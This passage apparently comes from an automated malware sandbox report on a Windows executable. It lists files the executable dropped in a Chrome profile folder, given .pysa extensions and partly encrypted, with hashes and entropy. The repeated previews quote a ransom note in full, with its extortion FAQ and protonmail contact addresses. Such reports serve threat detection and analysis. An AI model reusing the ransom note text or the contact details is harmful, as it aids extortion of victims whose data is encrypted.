                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_0.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):9216
                  Entropy (8bit):7.669967590529534
                  Encrypted:false
                  SSDEEP:192:L4ntLVle1Adid79Om8ybaAAyZVtF0XpPYlZXvXIYMeq1iIkQi7l81ALZhV:LS9V01Adid7zFbDAyMW/fY87fB7v3
                  MD5:2A61BB6BCB47A77B9FCB095F406E347A
                  SHA1:939CB396C9D2E051DE301FB7CF50F2AE3B746C63
                  SHA-256:4FBFF7E19E83FCA6A7476C00CDD4320C995ED13F4AF96F3AE82BD5DE7EEDA1F5
                  SHA-512:F7F80E794E6EB4F6F5576A9C6236732213B16A17B231D58148FC0161277B89F8B481E823BB422CCFEB2B1947BD4AB2E86D3594DC7837C08E079911DF25BBE3D4
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):206848
                  Entropy (8bit):7.998028706705655
                  Encrypted:true
                  SSDEEP:3072:XPuAZe1Qmdrw5qdhbMsbRKxuBG22zCkS8LkQtA2iwpXjK8avP2mewYv:fuAZe1QCw56KuB+zCk7oQG2DpTtVmevv
                  MD5:01F12C64A5B51A80A8D8929096A81EA2
                  SHA1:7A66B6F8539170A5ADE4C0EE8D617C01F3B921D5
                  SHA-256:57301DAFBC39E8529406C64EE859414F9B9B52C4162A12F7360F888521F769A5
                  SHA-512:107BECD10006266AFA05971EFED8129EC46B1FC5822E9BAEB94442223CFEFD38190ED5C1F01010E7A40158766E3237790AEB5E4902849C2B7AB0E1200FF97D07
                  Malicious:true
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_2.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):9216
                  Entropy (8bit):7.665615466860998
                  Encrypted:false
                  SSDEEP:192:TqHgk82xFDDVa1z9yJFxspoMu1BfNDKAAbGZAeAKBqOCNqcw82q6xJcueeYm:TqH582xFDD0eJ3spoMuTfN2AAbNeaOrv
                  MD5:194C05348C83D62E3332CEA17410F0A8
                  SHA1:BDC5C162FB318A7A225FEF93D229AEEE91306B49
                  SHA-256:8F81DC0E65903B58295ED238DD3361F2964648FC93B311EF0BD1B5F3CFACDF82
                  SHA-512:4CE83374F54D9BB0EAA515637B90FEA462E9D104E4AF5625A528E9A1778CE1F52D5A2155CB9295E82D70E7B831EA9DDBD336A5D22B497A2CE5D2C2A54E384E41
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_3.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):9216
                  Entropy (8bit):7.67794562548029
                  Encrypted:false
                  SSDEEP:192:BuJl8VQKG7Sp15E+AelnSjyhKhk8hTStV7vVL+ZVt3TsqDm+dhbIkAL+Flf97B:kl89Gy15NAelSjMgp90VJUI+t9
                  MD5:35074AF50F4CCD76D658596FF1652030
                  SHA1:AEF4555102DE1D810590C60F6507600A75D6B341
                  SHA-256:730AD76B1BD83815F8FDC77C8436655FCBB4C13DEE73960FCC3A3A33BBDD2ED1
                  SHA-512:623AD9192770AF659D44801C5FA5A5BFDECDDA9E6C83CDB4DAC727534CA101A414F36AAC9157CFB1ABF92BF4BE929C8F2BCA14001A8CEE8D9A85020D2485AAFD
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache\index.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):206848
                  Entropy (8bit):7.998082545694978
                  Encrypted:true
                  SSDEEP:6144:lzKNG6bHPjNxB8ljfz0OpXKnuAoHABGNYoJlI0gEbiA32D:lzKg6DB8Nfz0OfAoh3JlI+biso
                  MD5:29E28B24A780E7A5A36007A518EF8BFF
                  SHA1:F340D676AB81E128A010869FB34A4AAE91294119
                  SHA-256:2041F9E295286E254AC718DC6F2390A18F8AE6D0A27DD417FAC690DEE907F9FB
                  SHA-512:C40C49FD81910258A7B363603F6AC64D89EA9ED5E7BC8BA3F6E35B663C98898CADCC4CB1D43474631B12DA433ABA3E6ECD457AC503BEDD5B97E3814C5CA1FE80
                  Malicious:true
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Google Profile.ico.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):104448
                  Entropy (8bit):7.9945312139917535
                  Encrypted:true
                  SSDEEP:1536:fRAtoDHCuk7Zv2EbDbAgnIFd/a6VrFf8GXNLVtv8xjFe5yqhglJsDbdINf6X9:fhCuqp2EnbAgnm/trFf8G9heJqMyDb6g
                  MD5:A2CD0E9A20F1201B526B5AD22083417D
                  SHA1:D1C5B88F06AD1E5A6611B0C8B0C695092B2AFAF3
                  SHA-256:B7C8796E66BC52CA6D1A3CBB23338C0F1A90CC13D9C2405E4B3FB09FC5D782D5
                  SHA-512:9A3E3FDD022CA77F517D5B8767DAE0F9A66105163B59EA8C9B3EEAD946D63240E69C04A1AEE7828B8410BECAF77631402D6931697925BE67C810CBDADBA8C576
                  Malicious:true
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):104448
                  Entropy (8bit):7.994078523915232
                  Encrypted:true
                  SSDEEP:1536:VeVLroPn2xwjB1IcRpjO9DL0Ijd2gliKfOzDOGUqRmtZmtI6wFimg:Vq8uUBucXjM4LDKF7qTMG
                  MD5:CC08A8590079AB503BEF3C5B6AF45D3E
                  SHA1:42E64F28889621FDFB570905D28A63437ABAD853
                  SHA-256:D03F20D84A4162D4756158F6D8A7B3F5D34C60D66D62589068B2A3DF5A2FB83F
                  SHA-512:B4BAD684F77768744EA09EF90FD9D9438854DC43403EB1F4461E9D57DED503FBD5ECB42E053F4B172164CC9120CECAB7A143AA0548CF330EE526731B36CB8528
                  Malicious:true
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Last Session.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5120
                  Entropy (8bit):7.147297225220778
                  Encrypted:false
                  SSDEEP:96:0zJwA8S6qBgnK2jmRv4gKsGqFcZlR6ixbkz4LHHd88DHzuAE4QnQWN:CBWHjEIZpZCEI4LHHysTuAXQN
                  MD5:3ABF5FD1BDCB2FDC777DC6547B064B98
                  SHA1:E51E2DDDA2E1A028242FD35306CDC4A37C688594
                  SHA-256:0DC26A3CE66882A85696C20441A95585BFA81CFC49463CA2AD6DB3FD748DA119
                  SHA-512:6F0873F600331822D5FA0383003BD933D9771654561AB9C3AABA1B9BC242E00D2B28BFF066B1C9F9DE857DD68452DF92A8AF1A0828F613FB439C1E6E1ACFD1D3
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6144
                  Entropy (8bit):7.362556754798233
                  Encrypted:false
                  SSDEEP:96:9+lU/VYnmBUnY3vXH8QtvIxJHBHgbEAJJRplKJCfDtUuBBKJvKQiqJzQf+gNYX9X:slU/VY9nqvz9IxFhg4yRpMi2iKJ5iYvP
                  MD5:E8DE9B221B4C1FC6DADE1AAC02CAD681
                  SHA1:377C4C486B551BA0923BCC2A586CCC37E8D066FD
                  SHA-256:4E348ADD2DCD5604A869DE44E3925A9DEF5C62976490C0CE353716E711FC2573
                  SHA-512:C33C1BC6604068D990BFD6388B0462B46C44C9A444FD5BF8EDB96ECC6D0B0B446E15ED9B16772BE6855D8B920D256ECB7A2CE3080B4C7AE289357E98C3266A34
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):41984
                  Entropy (8bit):7.974881543618746
                  Encrypted:false
                  SSDEEP:768:tMM1B54F/UWsAmUmy4OfewS2wEfECmAQ8OJEuMmgqGHoPm+L3A4z1/xNjYmHsSp:uM1W/nm9eeqZmD8OJEuTxNus39d7
                  MD5:23671604A6A243B49317EA16D8DB4BE3
                  SHA1:796AFEAEE05692D6AF658D96FD534E0F942A033E
                  SHA-256:8BACD5E24C783059987B8C130B757048BFFD06399D1E2157565ADF24F70E5D8E
                  SHA-512:DCB71F8B5A40560EC8CF3E6CCE1315B344B436B5B7EDD12BCA37866F4F4960381C7E5129A14C263BB0A6D49D2DD5466EB9E434D3B35952C7B3E91FEDED337DAB
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Media History.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):104448
                  Entropy (8bit):7.994338629925937
                  Encrypted:true
                  SSDEEP:1536:iEoPZn3+j8vzcEMde5BYPS9uqJUO26+eOM2vAwQ1vlntgQgXscZ35SvmALVOKG:olQ8vzMGB8umU72vMF/gYQpSuALsJ
                  MD5:75B21CF61F4E0BB73A1CC493E7C7C717
                  SHA1:51C7F2EC644A3B18ACD0A164E7AF5069B75FE2B3
                  SHA-256:BA77F47A3C81B813917C46F01BCB9154AC63CAFB2BC6F8EB6687A4B28127BFA8
                  SHA-512:07F799A220AB4F8D7130EFB38B1C32BBE5E35A775A7C08ABA25478E0D491073B1B3120FC33ADE6084827B5DA87D7F71538AE99D7F37C20386F1C9A8DB87756FF
                  Malicious:true
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network Action Predictor.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):37888
                  Entropy (8bit):7.970283670848064
                  Encrypted:false
                  SSDEEP:768:uljjoH/xbuTlHd7qaEesLXCo4tuvI0Y06CC58Yqs4oXw52xpmPYpXAPH15W3:0jjoH/xby97PEe8Coo01i3jVXw5AQQpb
                  MD5:185E20FCBEDF50D161071AA4F7BDB040
                  SHA1:45B923122D1093CAB3FEB4D3EF0C21FD8191B60A
                  SHA-256:B3038B9CE75C6BF5255ABE5805BC9739B8BA1CC6BE1A890174C50B4FDF99AA9A
                  SHA-512:C433392A43C7F1D91842BA1950E26D5F9D2911EE43474A7791033F35E6B13DB5A6BA49F8665CEB0BB9D9BDEDB56A370A3843E75B213F967CE205C692EA83E5E1
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network Persistent State.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6144
                  Entropy (8bit):7.365094530615888
                  Encrypted:false
                  SSDEEP:96:gc5QYNpKy5fBC55ZraEy4m97vWvV4ACj58T6ih7aJnlAt1vVkNMsXU7O:p5QYNpKy5f05PWE7m1WvrP1atlA9kNJP
                  MD5:BE852AC320603F613CBC14C3F1ED49DC
                  SHA1:B91C48A62772BD6E78AFA493D48615790AD99166
                  SHA-256:5259CEA845E8C664AD84EB776DB0333B84A4D453BC9840591B8CE6575A5A09C0
                  SHA-512:E275A63D477C6CAC5A854CE4AE7AA99F02724365ABCA5A516AAF775767B60C944976792BF50AA6492F83D83BC3FAEDE0B995548663AA1B3B0D2DF29C3A1EFB6B
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Platform Notifications\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):7168
                  Entropy (8bit):7.508224164473578
                  Encrypted:false
                  SSDEEP:192:ixxdzVOixwprV1mGmQfZSZtoqxetoytejr1veyXtx:6jxwJzMQf2tonAr1veydx
                  MD5:862FADE7803EFE8D66282BF3ED8FC299
                  SHA1:0FFB0F99418BC12CB99371545860D03672C15628
                  SHA-256:8D02060A79719378F3259FC1EC35778C116874C28772900BA6DC73D154CF697C
                  SHA-512:73AAF72EEF744FEA9D82A9C2899BC7BABA317FE6E9358066DD6DB4E0982E4EADD0EF124547D5DBFC36A906D20C575F74EE22DDED821AB0CBEC7751668DBC0EA6
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Reporting and NEL.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):37888
                  Entropy (8bit):7.9686031712512015
                  Encrypted:false
                  SSDEEP:768:WRHw4mEu9VYlSGkXlB9gumueW1V7y64NtpXOBxKfsgr8IfV:c6EujYl3k1/g61VIt5rEgYIfV
                  MD5:21BF24AE7BA4F00D8560400BD276C610
                  SHA1:419918AB9E746D0DD21B3B74F8B632EBD3B218AE
                  SHA-256:4B730F0AD793CFAFA06A9A643E51BDFA3DC776A3B1A80E5DDEDF74D621E73CF3
                  SHA-512:A05733E6C65849AE8A5F642A565798FE7BD608232CA3B06CF560BA8AB7DE3E69282DC246F3CAA43940840E742FDBEA3FFE75F5038E2DE73EC7EEBE0D5D7A8824
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):33792
                  Entropy (8bit):7.965011117857326
                  Encrypted:false
                  SSDEEP:768:MFNn/TXASwb3KdOxg+s7RLEwuSmc1ghSyWaarUE2k2CM9fN86:sNn/TXAS0VhSE9zbWaI6rfK6
                  MD5:81FB36F36DF57AF28AA059DAC3107FD1
                  SHA1:A5853C5E2DFD183454BFA358AB98AF1B49DD803F
                  SHA-256:B6775C0418A96B72DA201D255DF5B2760945F7A8ABA3ABCB3E5F581808CE9BDD
                  SHA-512:6DBF216D0AF5367D27A6456B0E1547CD4B1CB18FFA6CCF0DBFEBA1D6B5D04BC002649059459BCA4CBCFD253D226ADBB02A04203E6842BC3CD320052E66C55DB9
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Shortcuts.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):21504
                  Entropy (8bit):7.92117764811029
                  Encrypted:false
                  SSDEEP:384:e2cC/Lbo6zI6TnLboOjIHlCNj2RcQBsAowX8trBbRe4:e2ZL8UI6TncRcQ6cstrtRe4
                  MD5:CE11F1F23F069E718F3B0CE3EADDECA2
                  SHA1:DEFF6FD46E8E49FA64200F097AC527D1FDA30AA4
                  SHA-256:5406EF0F4F72E29BE75C10E35DDF366F27648A54A44FE48FA6DAE99C1FC0C80D
                  SHA-512:1EBF9C75E901F442EC6574CD2CDECEE20320E1C4EBF7E29151F045E8E1BC20B873708474156EBF67B8C9CB82312538E2C252BBEA9415673775817D30D84B6930
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
